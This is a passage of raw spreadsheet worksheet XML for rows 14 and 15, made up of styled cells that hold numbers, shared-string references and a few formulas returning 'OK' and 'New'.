      <c r="FG14" s="102" t="s">
        <v>1796</v>
      </c>
      <c r="FH14" s="102">
        <v>1</v>
      </c>
      <c r="FI14" s="103" t="s">
        <v>336</v>
      </c>
      <c r="FJ14" s="103">
        <v>1</v>
      </c>
      <c r="FK14" s="104">
        <v>1</v>
      </c>
      <c r="FL14" s="105">
        <v>0</v>
      </c>
      <c r="FM14" s="106">
        <v>0</v>
      </c>
      <c r="FN14" s="497">
        <v>0</v>
      </c>
      <c r="FO14" s="107">
        <v>0</v>
      </c>
      <c r="FP14" s="107">
        <v>0</v>
      </c>
      <c r="FQ14" s="108">
        <v>0</v>
      </c>
      <c r="FR14" s="109">
        <v>1</v>
      </c>
      <c r="FS14" s="110" t="s">
        <v>1796</v>
      </c>
      <c r="FT14" s="501">
        <v>1</v>
      </c>
      <c r="FU14" s="111" t="s">
        <v>336</v>
      </c>
      <c r="FV14" s="111">
        <v>1</v>
      </c>
      <c r="FW14" s="112">
        <v>1</v>
      </c>
      <c r="FX14" s="113">
        <v>1</v>
      </c>
      <c r="FY14" s="114" t="s">
        <v>1796</v>
      </c>
      <c r="FZ14" s="503">
        <v>1</v>
      </c>
      <c r="GA14" s="115" t="s">
        <v>336</v>
      </c>
      <c r="GB14" s="115">
        <v>1</v>
      </c>
      <c r="GC14" s="116">
        <v>1</v>
      </c>
      <c r="GD14" s="250">
        <v>4</v>
      </c>
      <c r="GE14" s="251" t="s">
        <v>1902</v>
      </c>
      <c r="GF14" s="505">
        <v>4</v>
      </c>
      <c r="GG14" s="252" t="s">
        <v>1903</v>
      </c>
      <c r="GH14" s="252">
        <v>2</v>
      </c>
      <c r="GI14" s="253">
        <v>2</v>
      </c>
      <c r="GJ14" s="101">
        <v>5</v>
      </c>
      <c r="GK14" s="102" t="s">
        <v>2611</v>
      </c>
      <c r="GL14" s="102">
        <v>5</v>
      </c>
      <c r="GM14" s="103" t="s">
        <v>2612</v>
      </c>
      <c r="GN14" s="103">
        <v>3</v>
      </c>
      <c r="GO14" s="104">
        <v>3</v>
      </c>
      <c r="GP14" s="105">
        <v>0</v>
      </c>
      <c r="GQ14" s="106">
        <v>0</v>
      </c>
      <c r="GR14" s="497">
        <v>0</v>
      </c>
      <c r="GS14" s="107">
        <v>0</v>
      </c>
      <c r="GT14" s="107">
        <v>0</v>
      </c>
      <c r="GU14" s="108">
        <v>0</v>
      </c>
      <c r="GV14" s="109">
        <v>0</v>
      </c>
      <c r="GW14" s="110">
        <v>0</v>
      </c>
      <c r="GX14" s="501">
        <v>0</v>
      </c>
      <c r="GY14" s="111">
        <v>0</v>
      </c>
      <c r="GZ14" s="111">
        <v>0</v>
      </c>
      <c r="HA14" s="112">
        <v>0</v>
      </c>
      <c r="HB14" s="113">
        <v>1</v>
      </c>
      <c r="HC14" s="114" t="s">
        <v>1796</v>
      </c>
      <c r="HD14" s="503">
        <v>1</v>
      </c>
      <c r="HE14" s="115" t="s">
        <v>336</v>
      </c>
      <c r="HF14" s="115">
        <v>1</v>
      </c>
      <c r="HG14" s="116">
        <v>1</v>
      </c>
      <c r="HH14" s="101">
        <v>0</v>
      </c>
      <c r="HI14" s="102">
        <v>0</v>
      </c>
      <c r="HJ14" s="102">
        <v>0</v>
      </c>
      <c r="HK14" s="103">
        <v>0</v>
      </c>
      <c r="HL14" s="103">
        <v>0</v>
      </c>
      <c r="HM14" s="104">
        <v>0</v>
      </c>
      <c r="HN14" s="105">
        <v>0</v>
      </c>
      <c r="HO14" s="106">
        <v>0</v>
      </c>
      <c r="HP14" s="497">
        <v>0</v>
      </c>
      <c r="HQ14" s="107">
        <v>0</v>
      </c>
      <c r="HR14" s="107">
        <v>0</v>
      </c>
      <c r="HS14" s="108">
        <v>0</v>
      </c>
      <c r="HT14" s="109">
        <v>0</v>
      </c>
      <c r="HU14" s="110">
        <v>0</v>
      </c>
      <c r="HV14" s="501">
        <v>0</v>
      </c>
      <c r="HW14" s="111">
        <v>0</v>
      </c>
      <c r="HX14" s="111">
        <v>0</v>
      </c>
      <c r="HY14" s="112">
        <v>0</v>
      </c>
      <c r="HZ14" s="113">
        <v>0</v>
      </c>
      <c r="IA14" s="114">
        <v>0</v>
      </c>
      <c r="IB14" s="503">
        <v>0</v>
      </c>
      <c r="IC14" s="115">
        <v>0</v>
      </c>
      <c r="ID14" s="115">
        <v>0</v>
      </c>
      <c r="IE14" s="116">
        <v>0</v>
      </c>
      <c r="IF14" s="250">
        <v>16</v>
      </c>
      <c r="IG14" s="251" t="s">
        <v>2613</v>
      </c>
      <c r="IH14" s="505">
        <v>16</v>
      </c>
      <c r="II14" s="252" t="s">
        <v>2614</v>
      </c>
      <c r="IJ14" s="252">
        <v>16</v>
      </c>
      <c r="IK14" s="253">
        <v>1</v>
      </c>
      <c r="IL14" s="101">
        <v>16</v>
      </c>
      <c r="IM14" s="102" t="s">
        <v>2613</v>
      </c>
      <c r="IN14" s="102">
        <v>16</v>
      </c>
      <c r="IO14" s="103" t="s">
        <v>2614</v>
      </c>
      <c r="IP14" s="103">
        <v>16</v>
      </c>
      <c r="IQ14" s="104">
        <v>1</v>
      </c>
      <c r="IR14" s="105">
        <v>0</v>
      </c>
      <c r="IS14" s="106">
        <v>0</v>
      </c>
      <c r="IT14" s="497">
        <v>0</v>
      </c>
      <c r="IU14" s="107">
        <v>0</v>
      </c>
      <c r="IV14" s="107">
        <v>0</v>
      </c>
      <c r="IW14" s="108">
        <v>0</v>
      </c>
      <c r="IX14" s="109">
        <v>0</v>
      </c>
      <c r="IY14" s="110">
        <v>0</v>
      </c>
      <c r="IZ14" s="501">
        <v>0</v>
      </c>
      <c r="JA14" s="111">
        <v>0</v>
      </c>
      <c r="JB14" s="111">
        <v>0</v>
      </c>
      <c r="JC14" s="112">
        <v>0</v>
      </c>
      <c r="JD14" s="113">
        <v>0</v>
      </c>
      <c r="JE14" s="114">
        <v>0</v>
      </c>
      <c r="JF14" s="503">
        <v>0</v>
      </c>
      <c r="JG14" s="115">
        <v>0</v>
      </c>
      <c r="JH14" s="115">
        <v>0</v>
      </c>
      <c r="JI14" s="116">
        <v>0</v>
      </c>
      <c r="JJ14" s="101">
        <v>0</v>
      </c>
      <c r="JK14" s="102">
        <v>0</v>
      </c>
      <c r="JL14" s="102">
        <v>0</v>
      </c>
      <c r="JM14" s="103">
        <v>0</v>
      </c>
      <c r="JN14" s="103">
        <v>0</v>
      </c>
      <c r="JO14" s="104">
        <v>0</v>
      </c>
      <c r="JP14" s="105">
        <v>0</v>
      </c>
      <c r="JQ14" s="106">
        <v>0</v>
      </c>
      <c r="JR14" s="497">
        <v>0</v>
      </c>
      <c r="JS14" s="107">
        <v>0</v>
      </c>
      <c r="JT14" s="107">
        <v>0</v>
      </c>
      <c r="JU14" s="108">
        <v>0</v>
      </c>
      <c r="JV14" s="109">
        <v>0</v>
      </c>
      <c r="JW14" s="110">
        <v>0</v>
      </c>
      <c r="JX14" s="501">
        <v>0</v>
      </c>
      <c r="JY14" s="111">
        <v>0</v>
      </c>
      <c r="JZ14" s="111">
        <v>0</v>
      </c>
      <c r="KA14" s="112">
        <v>0</v>
      </c>
      <c r="KB14" s="113">
        <v>0</v>
      </c>
      <c r="KC14" s="114">
        <v>0</v>
      </c>
      <c r="KD14" s="503">
        <v>0</v>
      </c>
      <c r="KE14" s="115">
        <v>0</v>
      </c>
      <c r="KF14" s="115">
        <v>0</v>
      </c>
      <c r="KG14" s="116">
        <v>0</v>
      </c>
      <c r="KH14" s="250">
        <v>0</v>
      </c>
      <c r="KI14" s="251">
        <v>0</v>
      </c>
      <c r="KJ14" s="505">
        <v>0</v>
      </c>
      <c r="KK14" s="252">
        <v>0</v>
      </c>
      <c r="KL14" s="252">
        <v>0</v>
      </c>
      <c r="KM14" s="253">
        <v>0</v>
      </c>
      <c r="KN14" s="101">
        <v>0</v>
      </c>
      <c r="KO14" s="102">
        <v>0</v>
      </c>
      <c r="KP14" s="102">
        <v>0</v>
      </c>
      <c r="KQ14" s="103">
        <v>0</v>
      </c>
      <c r="KR14" s="103">
        <v>0</v>
      </c>
      <c r="KS14" s="104">
        <v>0</v>
      </c>
      <c r="KT14" s="105">
        <v>0</v>
      </c>
      <c r="KU14" s="106">
        <v>0</v>
      </c>
      <c r="KV14" s="497">
        <v>0</v>
      </c>
      <c r="KW14" s="107">
        <v>0</v>
      </c>
      <c r="KX14" s="107">
        <v>0</v>
      </c>
      <c r="KY14" s="108">
        <v>0</v>
      </c>
      <c r="KZ14" s="109">
        <v>0</v>
      </c>
      <c r="LA14" s="110">
        <v>0</v>
      </c>
      <c r="LB14" s="501">
        <v>0</v>
      </c>
      <c r="LC14" s="111">
        <v>0</v>
      </c>
      <c r="LD14" s="111">
        <v>0</v>
      </c>
      <c r="LE14" s="112">
        <v>0</v>
      </c>
      <c r="LF14" s="113">
        <v>0</v>
      </c>
      <c r="LG14" s="114">
        <v>0</v>
      </c>
      <c r="LH14" s="503">
        <v>0</v>
      </c>
      <c r="LI14" s="115">
        <v>0</v>
      </c>
      <c r="LJ14" s="115">
        <v>0</v>
      </c>
      <c r="LK14" s="116">
        <v>0</v>
      </c>
      <c r="LL14" s="117">
        <v>5</v>
      </c>
      <c r="LM14" s="507">
        <v>4</v>
      </c>
      <c r="LN14" s="119">
        <v>0</v>
      </c>
      <c r="LO14" s="119">
        <v>4</v>
      </c>
      <c r="LP14" s="119">
        <v>1</v>
      </c>
      <c r="LQ14" s="119">
        <v>0</v>
      </c>
      <c r="LR14" s="119">
        <v>1</v>
      </c>
      <c r="LS14" s="119">
        <v>1</v>
      </c>
      <c r="LT14" s="382"/>
      <c r="LU14" s="117">
        <v>0</v>
      </c>
      <c r="LV14" s="118">
        <v>0</v>
      </c>
      <c r="LW14" s="507">
        <v>0</v>
      </c>
      <c r="LX14" s="119">
        <v>0</v>
      </c>
      <c r="LY14" s="119">
        <v>0</v>
      </c>
      <c r="LZ14" s="119">
        <v>0</v>
      </c>
      <c r="MA14" s="117">
        <v>0</v>
      </c>
      <c r="MB14" s="118">
        <v>0</v>
      </c>
      <c r="MC14" s="507">
        <v>0</v>
      </c>
      <c r="MD14" s="119">
        <v>0</v>
      </c>
      <c r="ME14" s="119">
        <v>0</v>
      </c>
      <c r="MF14" s="119">
        <v>0</v>
      </c>
      <c r="MG14" s="117">
        <v>0</v>
      </c>
      <c r="MH14" s="118">
        <v>0</v>
      </c>
      <c r="MI14" s="507">
        <v>0</v>
      </c>
      <c r="MJ14" s="119">
        <v>0</v>
      </c>
      <c r="MK14" s="119">
        <v>0</v>
      </c>
      <c r="ML14" s="119">
        <v>0</v>
      </c>
      <c r="MM14" s="117">
        <v>0</v>
      </c>
      <c r="MN14" s="118">
        <v>0</v>
      </c>
      <c r="MO14" s="507">
        <v>0</v>
      </c>
      <c r="MP14" s="119">
        <v>0</v>
      </c>
      <c r="MQ14" s="119">
        <v>0</v>
      </c>
      <c r="MR14" s="119">
        <v>0</v>
      </c>
      <c r="MS14" s="117">
        <v>0</v>
      </c>
      <c r="MT14" s="118">
        <v>0</v>
      </c>
      <c r="MU14" s="507">
        <v>0</v>
      </c>
      <c r="MV14" s="119">
        <v>0</v>
      </c>
      <c r="MW14" s="119">
        <v>0</v>
      </c>
      <c r="MX14" s="119">
        <v>0</v>
      </c>
      <c r="MY14" s="117">
        <v>0</v>
      </c>
      <c r="MZ14" s="118">
        <v>0</v>
      </c>
      <c r="NA14" s="507">
        <v>0</v>
      </c>
      <c r="NB14" s="119">
        <v>0</v>
      </c>
      <c r="NC14" s="119">
        <v>0</v>
      </c>
      <c r="ND14" s="119">
        <v>0</v>
      </c>
      <c r="NE14" s="117">
        <v>2</v>
      </c>
      <c r="NF14" s="118" t="s">
        <v>4166</v>
      </c>
      <c r="NG14" s="507">
        <v>1</v>
      </c>
      <c r="NH14" s="119" t="s">
        <v>2538</v>
      </c>
      <c r="NI14" s="119">
        <v>1</v>
      </c>
      <c r="NJ14" s="119">
        <v>1</v>
      </c>
      <c r="NK14" s="117">
        <v>0</v>
      </c>
      <c r="NL14" s="118">
        <v>0</v>
      </c>
      <c r="NM14" s="507">
        <v>0</v>
      </c>
      <c r="NN14" s="119">
        <v>0</v>
      </c>
      <c r="NO14" s="119">
        <v>0</v>
      </c>
      <c r="NP14" s="119">
        <v>0</v>
      </c>
      <c r="NQ14" s="117">
        <v>0</v>
      </c>
      <c r="NR14" s="118">
        <v>0</v>
      </c>
      <c r="NS14" s="507">
        <v>0</v>
      </c>
      <c r="NT14" s="119">
        <v>0</v>
      </c>
      <c r="NU14" s="119">
        <v>0</v>
      </c>
      <c r="NV14" s="119">
        <v>0</v>
      </c>
      <c r="NW14" s="117">
        <v>3</v>
      </c>
      <c r="NX14" s="118" t="s">
        <v>4326</v>
      </c>
      <c r="NY14" s="507">
        <v>3</v>
      </c>
      <c r="NZ14" s="119" t="s">
        <v>4327</v>
      </c>
      <c r="OA14" s="119">
        <v>3</v>
      </c>
      <c r="OB14" s="119">
        <v>1</v>
      </c>
      <c r="OC14" s="120">
        <v>1</v>
      </c>
      <c r="OD14" s="120">
        <v>1</v>
      </c>
      <c r="OE14" s="120">
        <v>1</v>
      </c>
      <c r="OF14" s="120">
        <v>1</v>
      </c>
      <c r="OG14" s="120">
        <v>1</v>
      </c>
      <c r="OH14" s="120">
        <v>1</v>
      </c>
      <c r="OI14" s="120">
        <v>1</v>
      </c>
      <c r="OJ14" s="120">
        <v>1</v>
      </c>
      <c r="OK14" s="383"/>
      <c r="OL14" s="120">
        <v>1</v>
      </c>
      <c r="OM14" s="120">
        <v>1</v>
      </c>
      <c r="ON14" s="120">
        <v>1</v>
      </c>
      <c r="OO14" s="120" t="s">
        <v>2603</v>
      </c>
      <c r="OP14" s="120">
        <v>1</v>
      </c>
      <c r="OQ14" s="464">
        <v>1</v>
      </c>
      <c r="OR14" s="120">
        <v>0</v>
      </c>
      <c r="OS14" s="120">
        <v>0</v>
      </c>
      <c r="OT14" s="120">
        <v>0</v>
      </c>
      <c r="OU14" s="120"/>
      <c r="OV14" s="120">
        <v>0</v>
      </c>
      <c r="OW14" s="464">
        <v>0</v>
      </c>
      <c r="OX14" s="120">
        <v>0</v>
      </c>
      <c r="OY14" s="120">
        <v>0</v>
      </c>
      <c r="OZ14" s="120">
        <v>0</v>
      </c>
      <c r="PA14" s="120"/>
      <c r="PB14" s="120">
        <v>0</v>
      </c>
      <c r="PC14" s="464">
        <v>0</v>
      </c>
      <c r="PD14" s="120">
        <v>0</v>
      </c>
      <c r="PE14" s="120">
        <v>0</v>
      </c>
      <c r="PF14" s="120">
        <v>0</v>
      </c>
      <c r="PG14" s="120"/>
      <c r="PH14" s="120">
        <v>0</v>
      </c>
      <c r="PI14" s="464">
        <v>0</v>
      </c>
      <c r="PJ14" s="120">
        <v>0</v>
      </c>
      <c r="PK14" s="120">
        <v>0</v>
      </c>
      <c r="PL14" s="120">
        <v>0</v>
      </c>
      <c r="PM14" s="120"/>
      <c r="PN14" s="120">
        <v>0</v>
      </c>
      <c r="PO14" s="464">
        <v>0</v>
      </c>
      <c r="PP14" s="120">
        <v>0</v>
      </c>
      <c r="PQ14" s="120">
        <v>0</v>
      </c>
      <c r="PR14" s="120">
        <v>0</v>
      </c>
      <c r="PS14" s="120"/>
      <c r="PT14" s="120">
        <v>0</v>
      </c>
      <c r="PU14" s="464">
        <v>0</v>
      </c>
      <c r="PV14" s="120">
        <v>0</v>
      </c>
      <c r="PW14" s="120">
        <v>0</v>
      </c>
      <c r="PX14" s="120">
        <v>0</v>
      </c>
      <c r="PY14" s="120"/>
      <c r="PZ14" s="120">
        <v>0</v>
      </c>
      <c r="QA14" s="464">
        <v>0</v>
      </c>
      <c r="QB14" s="120">
        <v>1</v>
      </c>
      <c r="QC14" s="120">
        <v>1</v>
      </c>
      <c r="QD14" s="120">
        <v>1</v>
      </c>
      <c r="QE14" s="120" t="s">
        <v>2541</v>
      </c>
      <c r="QF14" s="120">
        <v>1</v>
      </c>
      <c r="QG14" s="464">
        <v>1</v>
      </c>
      <c r="QH14" s="120">
        <v>0</v>
      </c>
      <c r="QI14" s="120">
        <v>0</v>
      </c>
      <c r="QJ14" s="120">
        <v>0</v>
      </c>
      <c r="QK14" s="120"/>
      <c r="QL14" s="120">
        <v>0</v>
      </c>
      <c r="QM14" s="464">
        <v>0</v>
      </c>
      <c r="QN14" s="120">
        <v>0</v>
      </c>
      <c r="QO14" s="120">
        <v>0</v>
      </c>
      <c r="QP14" s="120">
        <v>0</v>
      </c>
      <c r="QQ14" s="120"/>
      <c r="QR14" s="120">
        <v>0</v>
      </c>
      <c r="QS14" s="464">
        <v>0</v>
      </c>
      <c r="QT14" s="184"/>
      <c r="QU14" s="184"/>
      <c r="QV14" s="184"/>
      <c r="QW14" s="184"/>
      <c r="QX14" s="184"/>
      <c r="QY14" s="184"/>
      <c r="QZ14" s="184"/>
      <c r="RA14" s="184"/>
      <c r="RB14" s="184"/>
      <c r="RC14" s="184"/>
      <c r="RD14" s="184"/>
      <c r="RE14" s="184"/>
      <c r="RF14" s="184"/>
      <c r="RG14" s="184"/>
      <c r="RH14" s="184"/>
      <c r="RI14" s="184"/>
      <c r="RJ14" s="184"/>
      <c r="RK14" s="184"/>
      <c r="RL14" s="184"/>
      <c r="RM14" s="184"/>
      <c r="RN14" s="184"/>
      <c r="RO14" s="184"/>
      <c r="RP14" s="184"/>
      <c r="RQ14" s="184"/>
      <c r="RR14" s="184"/>
      <c r="RS14" s="184"/>
      <c r="RT14" s="184"/>
      <c r="RU14" s="184"/>
      <c r="RV14" s="184"/>
      <c r="RW14" s="184"/>
      <c r="RX14" s="184"/>
      <c r="RY14" s="184"/>
      <c r="RZ14" s="184"/>
      <c r="SA14" s="184"/>
      <c r="SB14" s="184"/>
      <c r="SC14" s="184"/>
      <c r="SD14" s="184"/>
      <c r="SE14" s="184"/>
      <c r="SF14" s="184"/>
      <c r="SG14" s="184"/>
      <c r="SH14" s="184"/>
      <c r="SI14" s="184"/>
      <c r="SJ14" s="184"/>
      <c r="SK14" s="184"/>
      <c r="SL14" s="184"/>
      <c r="SM14" s="184"/>
      <c r="SN14" s="184"/>
      <c r="SO14" s="184"/>
      <c r="SP14" s="184"/>
      <c r="SQ14" s="184"/>
      <c r="SR14" s="184"/>
      <c r="SS14" s="184"/>
      <c r="ST14" s="184"/>
      <c r="SU14" s="184"/>
      <c r="SV14" s="184"/>
      <c r="SW14" s="184"/>
      <c r="SX14" s="184"/>
      <c r="SY14" s="184"/>
      <c r="SZ14" s="184"/>
      <c r="TA14" s="184"/>
      <c r="TB14" s="184"/>
      <c r="TC14" s="184"/>
      <c r="TD14" s="184"/>
      <c r="TE14" s="184"/>
      <c r="TF14" s="184"/>
      <c r="TG14" s="184"/>
      <c r="TH14" s="184"/>
      <c r="TI14" s="184"/>
      <c r="TJ14" s="184"/>
      <c r="TK14" s="184"/>
      <c r="TL14" s="184"/>
      <c r="TM14" s="184"/>
      <c r="TN14" s="184"/>
      <c r="TO14" s="184"/>
      <c r="TP14" s="184"/>
      <c r="TQ14" s="184"/>
      <c r="TR14" s="184"/>
      <c r="TS14" s="184"/>
      <c r="TT14" s="184"/>
      <c r="TU14" s="184"/>
      <c r="TV14" s="184"/>
      <c r="TW14" s="184"/>
      <c r="TX14" s="184"/>
      <c r="TY14" s="184"/>
      <c r="TZ14" s="184"/>
      <c r="UA14" s="184"/>
      <c r="UB14" s="184"/>
      <c r="UC14" s="184"/>
      <c r="UD14" s="184"/>
      <c r="UE14" s="184"/>
      <c r="UF14" s="184"/>
      <c r="UG14" s="184"/>
      <c r="UH14" s="184"/>
      <c r="UI14" s="184"/>
      <c r="UJ14" s="184"/>
      <c r="UK14" s="184"/>
      <c r="UL14" s="184"/>
      <c r="UM14" s="184"/>
      <c r="UN14" s="184"/>
      <c r="UO14" s="184"/>
      <c r="UP14" s="184"/>
      <c r="UQ14" s="184"/>
      <c r="UR14" s="184"/>
      <c r="US14" s="184"/>
      <c r="UT14" s="184"/>
      <c r="UU14" s="184"/>
      <c r="UV14" s="184"/>
      <c r="UW14" s="184"/>
      <c r="UX14" s="184"/>
      <c r="UY14" s="184"/>
      <c r="UZ14" s="184"/>
      <c r="VA14" s="184"/>
      <c r="VB14" s="184"/>
      <c r="VC14" s="184"/>
      <c r="VD14" s="184"/>
      <c r="VE14" s="184"/>
      <c r="VF14" s="184"/>
      <c r="VG14" s="184"/>
      <c r="VH14" s="184"/>
      <c r="VI14" s="184"/>
      <c r="VJ14" s="184"/>
      <c r="VK14" s="184"/>
      <c r="VL14" s="184"/>
      <c r="VM14" s="184"/>
      <c r="VN14" s="184"/>
      <c r="VO14" s="184"/>
      <c r="VP14" s="184"/>
      <c r="VQ14" s="184"/>
      <c r="VR14" s="184"/>
      <c r="VS14" s="184"/>
      <c r="VT14" s="184"/>
      <c r="VU14" s="184"/>
      <c r="VV14" s="184"/>
      <c r="VW14" s="184"/>
      <c r="VX14" s="184"/>
      <c r="VY14" s="184"/>
    </row>
    <row r="15" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A15" s="82" t="s">
        <v>14</v>
      </c>
      <c r="B15" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C15" s="83" t="s">
        <v>318</v>
      </c>
      <c r="D15" s="83" t="s">
        <v>35</v>
      </c>
      <c r="E15" s="83">
        <f t="shared" si="2"/>
        <v>12</v>
      </c>
      <c r="F15" s="83" t="s">
        <v>36</v>
      </c>
      <c r="G15" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H15" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I15" s="81" t="s">
        <v>870</v>
      </c>
      <c r="J15" s="85" t="s">
        <v>827</v>
      </c>
      <c r="K15" s="81" t="s">
        <v>871</v>
      </c>
      <c r="L15" s="81" t="s">
        <v>872</v>
      </c>
      <c r="M15" s="378" t="s">
        <v>2290</v>
      </c>
      <c r="N15" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O15" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P15" s="91"/>
      <c r="Q15" s="379" t="s">
        <v>8</v>
      </c>
      <c r="R15" s="92" t="s">
        <v>873</v>
      </c>
      <c r="S15" s="93" t="s">
        <v>787</v>
      </c>
      <c r="T15" s="92" t="s">
        <v>874</v>
      </c>
      <c r="U15" s="94" t="s">
        <v>4</v>
      </c>
      <c r="V15" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W15" s="96" t="s">
        <v>875</v>
      </c>
      <c r="X15" s="97" t="s">
        <v>876</v>
      </c>
      <c r="Y15" s="83" t="s">
        <v>877</v>
      </c>
      <c r="Z15" s="98" t="s">
        <v>878</v>
      </c>
      <c r="AA15" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB15" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC15" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD15" s="83"/>
      <c r="AE15" s="83"/>
      <c r="AF15" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG15" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH15" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI15" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ15" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK15" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL15" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM15" s="355" t="s">
        <v>4144</v>
      </c>
      <c r="AN15" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO15" s="356" t="s">
        <v>747</v>
      </c>
      <c r="AP15" s="357" t="s">
        <v>745</v>
      </c>
      <c r="AQ15" s="358">
        <v>2</v>
      </c>
      <c r="AR15" s="100"/>
      <c r="AS15" s="100">
        <v>1</v>
      </c>
      <c r="AT15" s="100">
        <v>0</v>
      </c>
      <c r="AU15" s="100">
        <v>1</v>
      </c>
      <c r="AV15" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW15" s="100">
        <v>5</v>
      </c>
      <c r="AX15" s="100">
        <v>5</v>
      </c>
      <c r="AY15" s="100">
        <v>0</v>
      </c>
      <c r="AZ15" s="100">
        <v>5</v>
      </c>
      <c r="BA15" s="381"/>
      <c r="BB15" s="101">
        <v>0</v>
      </c>
      <c r="BC15" s="102">
        <v>0</v>
      </c>
      <c r="BD15" s="102">
        <v>0</v>
      </c>
      <c r="BE15" s="103">
        <v>0</v>
      </c>
      <c r="BF15" s="103">
        <v>0</v>
      </c>
      <c r="BG15" s="104">
        <v>0</v>
      </c>
      <c r="BH15" s="105">
        <v>8</v>
      </c>
      <c r="BI15" s="106" t="s">
        <v>1984</v>
      </c>
      <c r="BJ15" s="497">
        <v>4</v>
      </c>
      <c r="BK15" s="107" t="s">
        <v>1985</v>
      </c>
      <c r="BL15" s="107">
        <v>4</v>
      </c>
      <c r="BM15" s="108">
        <v>2</v>
      </c>
      <c r="BN15" s="109">
        <v>8</v>
      </c>
      <c r="BO15" s="110" t="s">
        <v>1984</v>
      </c>
      <c r="BP15" s="501">
        <v>4</v>
      </c>
      <c r="BQ15" s="111" t="s">
        <v>1985</v>
      </c>
      <c r="BR15" s="111">
        <v>4</v>
      </c>
      <c r="BS15" s="112">
        <v>2</v>
      </c>
      <c r="BT15" s="113">
        <v>7</v>
      </c>
      <c r="BU15" s="114" t="s">
        <v>2615</v>
      </c>
      <c r="BV15" s="503">
        <v>3</v>
      </c>
      <c r="BW15" s="115" t="s">
        <v>2616</v>
      </c>
      <c r="BX15" s="115">
        <v>2</v>
      </c>
      <c r="BY15" s="116">
        <v>2</v>
      </c>
      <c r="BZ15" s="250">
        <v>25</v>
      </c>
      <c r="CA15" s="251" t="s">
        <v>2617</v>
      </c>
      <c r="CB15" s="505">
        <v>11</v>
      </c>
      <c r="CC15" s="252" t="s">
        <v>2618</v>
      </c>
      <c r="CD15" s="252">
        <v>10</v>
      </c>
      <c r="CE15" s="253">
        <v>2</v>
      </c>
      <c r="CF15" s="101">
        <v>32</v>
      </c>
      <c r="CG15" s="102" t="s">
        <v>2619</v>
      </c>
      <c r="CH15" s="102">
        <v>14</v>
      </c>
      <c r="CI15" s="103" t="s">
        <v>2620</v>
      </c>
      <c r="CJ15" s="103">
        <v>12</v>
      </c>
      <c r="CK15" s="104">
        <v>2</v>
      </c>
      <c r="CL15" s="105">
        <v>0</v>
      </c>
      <c r="CM15" s="106">
        <v>0</v>
      </c>
      <c r="CN15" s="497">
        <v>0</v>
      </c>
      <c r="CO15" s="107">
        <v>0</v>
      </c>
      <c r="CP15" s="107">
        <v>0</v>
      </c>
      <c r="CQ15" s="108">
        <v>0</v>
      </c>
      <c r="CR15" s="109">
        <v>0</v>
      </c>
      <c r="CS15" s="110">
        <v>0</v>
      </c>
      <c r="CT15" s="501">
        <v>0</v>
      </c>
      <c r="CU15" s="111">
        <v>0</v>
      </c>
      <c r="CV15" s="111">
        <v>0</v>
      </c>
      <c r="CW15" s="112">
        <v>0</v>
      </c>
      <c r="CX15" s="113">
        <v>8</v>
      </c>
      <c r="CY15" s="114" t="s">
        <v>1984</v>
      </c>
      <c r="CZ15" s="503">
        <v>4</v>
      </c>
      <c r="DA15" s="115" t="s">
        <v>1985</v>
      </c>
      <c r="DB15" s="115">
        <v>4</v>
      </c>
      <c r="DC15" s="116">
        <v>2</v>
      </c>
      <c r="DD15" s="101">
        <v>0</v>
      </c>
      <c r="DE15" s="102">
        <v>0</v>
      </c>
      <c r="DF15" s="102">
        <v>0</v>
      </c>
      <c r="DG15" s="103">
        <v>0</v>
      </c>
      <c r="DH15" s="103">
        <v>0</v>
      </c>
      <c r="DI15" s="104">
        <v>0</v>
      </c>
      <c r="DJ15" s="105">
        <v>5</v>
      </c>
      <c r="DK15" s="106" t="s">
        <v>2621</v>
      </c>
      <c r="DL15" s="497">
        <v>1</v>
      </c>
      <c r="DM15" s="107" t="s">
        <v>2622</v>
      </c>
      <c r="DN15" s="107">
        <v>1</v>
      </c>
      <c r="DO15" s="108">
        <v>1</v>
      </c>
      <c r="DP15" s="109">
        <v>5</v>
      </c>
      <c r="DQ15" s="110" t="s">
        <v>2621</v>
      </c>
      <c r="DR15" s="501">
        <v>1</v>
      </c>
      <c r="DS15" s="111" t="s">
        <v>2622</v>
      </c>
      <c r="DT15" s="111">
        <v>1</v>
      </c>
      <c r="DU15" s="112">
        <v>1</v>
      </c>
      <c r="DV15" s="113">
        <v>6</v>
      </c>
      <c r="DW15" s="114" t="s">
        <v>2623</v>
      </c>
      <c r="DX15" s="503">
        <v>2</v>
      </c>
      <c r="DY15" s="115" t="s">
        <v>1894</v>
      </c>
      <c r="DZ15" s="115">
        <v>1</v>
      </c>
      <c r="EA15" s="116">
        <v>2</v>
      </c>
      <c r="EB15" s="250">
        <v>11</v>
      </c>
      <c r="EC15" s="251" t="s">
        <v>2624</v>
      </c>
      <c r="ED15" s="505">
        <v>3</v>
      </c>
      <c r="EE15" s="252" t="s">
        <v>2625</v>
      </c>
      <c r="EF15" s="252">
        <v>2</v>
      </c>
      <c r="EG15" s="253">
        <v>2</v>
      </c>
      <c r="EH15" s="101">
        <v>17</v>
      </c>
      <c r="EI15" s="102" t="s">
        <v>2626</v>
      </c>
      <c r="EJ15" s="102">
        <v>5</v>
      </c>
      <c r="EK15" s="103" t="s">
        <v>2627</v>
      </c>
      <c r="EL15" s="103">
        <v>3</v>
      </c>
      <c r="EM15" s="104">
        <v>2</v>
      </c>
      <c r="EN15" s="105">
        <v>0</v>
      </c>
      <c r="EO15" s="106">
        <v>0</v>
      </c>
      <c r="EP15" s="497">
        <v>0</v>
      </c>
      <c r="EQ15" s="107">
        <v>0</v>
      </c>
      <c r="ER15" s="107">
